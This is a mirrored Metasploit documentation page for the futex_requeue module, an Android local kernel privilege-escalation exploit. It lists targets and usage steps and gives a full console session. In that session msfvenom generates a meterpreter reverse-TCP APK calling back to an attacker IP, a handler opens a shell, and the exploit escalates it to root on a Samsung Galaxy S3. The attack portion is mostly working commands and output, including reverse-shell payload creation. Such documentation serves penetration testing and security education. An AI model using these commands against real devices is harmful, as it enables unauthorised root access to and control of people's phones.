Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/android/local/futex_requeue.md
27898 views

Vulnerable Application

This module exploits a Linux Kernel vulnerability, which is also available in the Android kernel, in a Linux subsystem call of futex. It does not trip (set off) Samsung NOX as of the time of writing.

Failed exploitation attempts may reboot the device.

Verification Steps

  1. Start msfconsole

  2. Get a shell on a vulnerable android device

  3. Do: use exploit/android/local/futex_requeue

  4. Select an appropriate target

  5. Do: set lhost [IP]

  6. Do: run

  7. You should get a root shell.

Targets

0 Automatic Targeting

Attempt to automatically determine the target

1 Default

Nexus 4, 5, 7, etc

2 New Samsung

Samsung S3, S4, S5, etc

3 Old Samsung

Samsung Note 2, etc

4 Samsung Grand

Samsung Grand, etc

Scenarios

Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)

The following was used to generate a meterpreter Android application, and it was installed to the device.

msfvenom -p android/meterpreter_reverse_tcp LHOST=111.111.1.111 LPORT=9999 -o /var/www/html/android.apk

[*] Processing android.128.rb for ERB directives.
resource (android.128.rb)> use exploit/multi/handler
resource (android.128.rb)> set payload android/meterpreter_reverse_tcp
payload => android/meterpreter_reverse_tcp
resource (android.128.rb)> set lport 9999
lport => 9999
resource (android.128.rb)> set lhost 111.111.1.111
lhost => 111.111.1.111
resource (android.128.rb)> run
[*] Started reverse TCP handler on 111.111.1.111:9999 
[*] Meterpreter session 1 opened (111.111.1.111:9999 -> 222.222.2.222:56975) at 2019-10-22 20:56:34 -0400
WARNING: Local file /root/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
WARNING: Local files may be incompatible with the Metasploit Framework

meterpreter > sysinfo
Computer    : localhost
OS          : Android 4.4.2 - Linux 3.4.0-1542239 (armv7l)
Meterpreter : dalvik/android
meterpreter > getuid
Server username: u0_a191
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/android/local/futex_requeue 
msf exploit(android/local/futex_requeue) > set session 1
session => 1
msf exploit(android/local/futex_requeue) > set verbose true
verbose => true
msf exploit(android/local/futex_requeue) > set lhost 111.111.1.111
lhost => 111.111.1.111
msf exploit(android/local/futex_requeue) > check

[+] Android version 4.4.2 appears to be vulnerable
[*] The target appears to be vulnerable.
msf exploit(android/local/futex_requeue) > run

[*] Started reverse TCP handler on 111.111.1.111:4444 
[+] Android version 4.4.2 appears to be vulnerable
[*] Found device: d2vzw
[*] Fingerprint: Verizon/d2vzw/d2vzw:4.4.2/KOT49H/I535VRUDNE1:user/release-keys
[*] Using target: New Samsung
[*] Loading exploit library /data/data/com.metasploit.stage/files/thelr
[*] Loaded library /data/data/com.metasploit.stage/files/thelr, deleting
[*] Waiting 300 seconds for payload
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (904600 bytes) to 222.222.2.222
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:37502) at 2019-10-22 20:57:45 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0